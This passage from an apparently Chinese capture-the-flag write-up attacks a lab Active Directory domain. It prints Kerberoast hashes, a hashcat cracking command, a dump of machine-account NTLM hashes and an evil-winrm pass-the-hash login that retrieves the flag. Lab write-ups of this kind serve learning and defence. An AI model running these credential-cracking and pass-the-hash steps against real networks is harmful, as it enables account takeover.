043ddd2f3fd089a1e461282ece6690ac0cc6237d304f3572d2d1f630d4debde877af859c065bed686b0ba2b7175d57ccd4f7dd0c54fca795cf3b801e1d963e4104a3ae3d9cb247caee9a27038d7e7d066aa467e9a18b877bb36caa2ee2191a8320490b0999edc8f2555e917c1c6320479c6cf5469fe5e66bafcf44f3089c5866de325af1d0c5f1b02cd3265e628a6ff2006
$krb5tgs$23$*web_svc$SOUPEDECODE.LOCAL$SOUPEDECODE.LOCAL/web_svc*$d87ae6291438e85b5d174bce2327ab51$a10a319592a8ef8e2f670d9d7b6de6d60b8804ed933d649472372db53d112e8d32b3cd5face8c82a1b55c304d727da88890c55acfb0e8ce3ad9edeb3da788b8a3a36d08182ca568f6f520ff1d777b5fc9e7c2234a1252db6ed8be4f37af551d352d04f2b2ec2222adc16422cb172542c68a9a980cd52357e18d54c91635af67f345387a0ba17f69a7796bfac337cb2adf1d336e51f201ab9d79fa2274938a105f40c224e042f80b77ea8fa35e94dff48c9f1bd4428c1b3f987cd282e6e66d65f4e7ca497edded7d6fa27e3aa32a474c70ac1f359ad5f0bcf9e49c22daad8623901eb0f84096ccd7e8d51badf1916e87c8005c341a2e09046f5cc36ec433215c647b02f3b3d928413ca6a7b7d4ad3d3357f167aebf56fac7c99d35f3389d77f349ecb5eab802be5ea76a9925740a2e592ce05d151a0074793d6d43f491572e5e05ac5e8c08961d96dcfd9fc77ae4c86c63a31e0f4faf6d920b6594b3d3dbe1638f4ab3d26b0672d5d1ebbf93f28d52822095484e5dfed11992989a48138304e4d1a104fe2d9b78ee19cd7239de68312008c32335a29926aad74c942ebac857651989ee9bdd0ebcb0715f64d59a3e5f03ce49471c97a5dcc0042ddbc29495f5776fad0464860c9d2a1f4a3320a29d04ca75b15e30bed50d2143399cd668c62005453f62182303b03cb5f915a7b74e0d6ba9142e03a72f347a072be3aaebdf3f52010f32a3b7db45194a23a1beaa42789693f39f522cc571611f11a977f74af0837b1798081140ea8e2d931106daed356cac8ccaa129765d6075c06b21f5e8ae7e1b6d296330d81595504fc7879e0951aa41836abfbfef33eb50926ffc616320fc8780aacf0be7b1b150ec501e74802d1253308cec5b34b5bcdd9a9425083e841fcaae5520109b1ee38c44d017212cd5a43c2cf822371c6a36419456dd8a5505509f62ade4964a290f8c9e935e335c4cacfdd5f45106a2c45c83c682395de4d25671fda6ad66eb3adec294ec32feb65a8e008b41f02df44208a24568b54e7598aec9228916a6b44d4f8c76e7c4db273876b4048675dac53bcb15e9cea3bf08d5dcab042b70c46e11042b4f1a1aa0038140f93544e2da1cdcd5354b15b4e60f4ca79a8184550195a919ae4e043ed878fdab3f155327a82339424bcb1d6273d500732bf28c0f66838f3c7ddde87f6002219c5ff906749f8a53ffe60de14d0c84246e5ded0e64fa5e6195b44e9ffe18e713c4a7f7da7a41aabbe428c555e37f656ca8f40e4c706b0ead902d376c82687209261fe3f8e3ab2b90dd71220005a250bbe9d01a2592e8049b3217a4c2b402afd2d355ba3537d516ccf49ae940a8fbe1b2458c23e4f34aa68a127965622f2f848b43b0d9fd5a1aa8de87c32096e62ac86277c82b5dd34f9a01f77a5b96148280c9e4e972b910e83d30f70ad51d5c894e817a4ea78677a9a0b4a103e944ff07faae9fba78543f18a4190806dcfff41a6b72c16ba
$krb5tgs$23$*monitoring_svc$SOUPEDECODE.LOCAL$SOUPEDECODE.LOCAL/monitoring_svc*$eb887b5eff5eae86bcdbbcb9c32c80cd$2fe325e6569656749afdf552a80f4b5f1aebd86a2558539b0b9e4e6db1234dfca820d1f9e5f91b4d73b3173a9da72a89e56bee7df6dc97bb799c541a6099847d286ed9e2b7016adb1788408eefd6f3cc8df7579d9407a913a6abe38999666b340bdeb67e29995fe26debc06de31d8fb71d6ecf0447e96770278e0192fc2c1a23b7fe791b4070186cb05c1c5b77a7a577a2da3fb3b21e8a46b60d1a693329c8eca71d21328f31f430cb2de3fc6a4a43a62c55585fa7342eb1c51168f52e854c5b164e452fbfaaa105f26a9ff075310c55943bf4915fe7ce37d77cef446c8e8f13181ab8dc04143e4097ebf8697e8375da3d5077a1b9cf7082410d2d14fe51387734883920dcaac2271c495142028bbb78d3455c8853e0cc2e923621cdf06e7d48c4f43ad8c013fa81ab2147240f97863199d261dbd77882ccd0f06a78647d874c3384dc5fafa37a30fffbee73a3cf46bf9ea40667abcb0cf5eb75704cecc1ad81c4a8f7394b4bfdf50c60f2ea796ae276358fcad4f9efb5b88bd66e25f538b45f486d9239677e9adbe8744c46d79a520fe0ed22f3b01ae5efda1ea1e47a05459afba70b7c50a90829822f2fd5b1343221fc6454f933b463a00ce744325ae4a3ce783977c84dd9e597fc0786f99020b125eb35e5d55457deb4f35903babacafedbce4e349b11101a8c9c1248c707a0f0640ddaacd61b37aaecd3f71c618c8fde4a1e9a9523b5c1fd4d7388e313dfdf47444394518dd4f97386a73f94c1aa89cc7907466cb1b877051aaff363d4e640cfa298a1824f710f2caf334decc3cd46deba54af16611a0cb24c64ad92a7607381768cb47b6de73d9c6e9e2ab56999b48404be2a30572e21d4ec9aed8a600ad48d421b55b283d96e190beb6be87b05fa375926fd3dadcfd4da0ecebf057633f4a0a76f7bac51f2daa3748f4b397a1391a64dfb1cf45029be79b4077ef0d0958ddce77a6594d7a0ab69f253348e7661c06a9e2bca3d2c84597f7ea5db000bc287c7d7add6176de1065be88bcbdf51291c8a64285b7e7963fae9bffdc5373cfd41418b5e89bef7f6eb5848198fff214440592e21437298a8ce21454214d2c6793bdef948d260e6cac137e906207d4f28ba3f72e4ce512800132f8c6655259919880ad6eeac4f6c4a3f8aca797118922aba7ee744f968fcd2e2cc95aaf7240fbc955bc64e5f4f971ab02f3db4c4bd76216314f3e6a0f1852bf7d55134e48d019a089c70f4185ea7e754f549561128813db79fda9f34035983d178d5bdfbd2f32f64fa27aedb23bece70ad41b9293cccda3e3154c230d21ed44dad8fe0c36971dd44ca137b9cfe9abac55a0589263fbd78f28b68f43f66ca6b12a88575941bf51d3d8bd3c8f2d0efd9975cb793050fb315513dc15ead23af6f9e23f31bc687fc2d92afe8bdf9874da096109ddf01849f883f6639287704351167d4fbb501f72f8497a17dfc5b434e5874d1171e203a1dcef87797c5
然后用hashcat去爆
hashcat -a 0 -m 13100 ./file_svc.hash $HVV_Tool/8_dict/kali.txt --force
这里爆出来file_svc用户的密码是Password123!!。其他用户没爆出来。
哈希传递
用新用户连上smb的backup文件夹,里面只有一个文件backup_extract.txt。
内容如下:
WebServer$:2119:aad3b435b51404eeaad3b435b51404ee:c47b45f5d4df5a494bd19f13e14f7902:::
DatabaseServer$:2120:aad3b435b51404eeaad3b435b51404ee:406b424c7b483a42458bf6f545c936f7:::
CitrixServer$:2122:aad3b435b51404eeaad3b435b51404ee:48fc7eca9af236d7849273990f6c5117:::
FileServer$:2065:aad3b435b51404eeaad3b435b51404ee:e41da7e79a4c76dbd9cf79d1cb325559:::
MailServer$:2124:aad3b435b51404eeaad3b435b51404ee:46a4655f18def136b3bfab7b0b4e70e3:::
BackupServer$:2125:aad3b435b51404eeaad3b435b51404ee:46a4655f18def136b3bfab7b0b4e70e3:::
ApplicationServer$:2126:aad3b435b51404eeaad3b435b51404ee:8cd90ac6cba6dde9d8038b068c17e9f5:::
PrintServer$:2127:aad3b435b51404eeaad3b435b51404ee:b8a38c432ac59ed00b2a373f4f050d28:::
ProxyServer$:2128:aad3b435b51404eeaad3b435b51404ee:4e3f0bb3e5b6e3e662611b1a87988881:::
MonitoringServer$:2129:aad3b435b51404eeaad3b435b51404ee:48fc7eca9af236d7849273990f6c5117:::
使用evil-winrm登录FileServer,成功,并在admin用户桌面上找到root.txt
evil-winrm -i SOUPEDECODE.LOCAL -u "FileServer$" -H "e41da7e79a4c76dbd9cf79d1cb325559" -l ./winrm_log
a9564ebc3289b7a14551baf8ad5ec60a
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
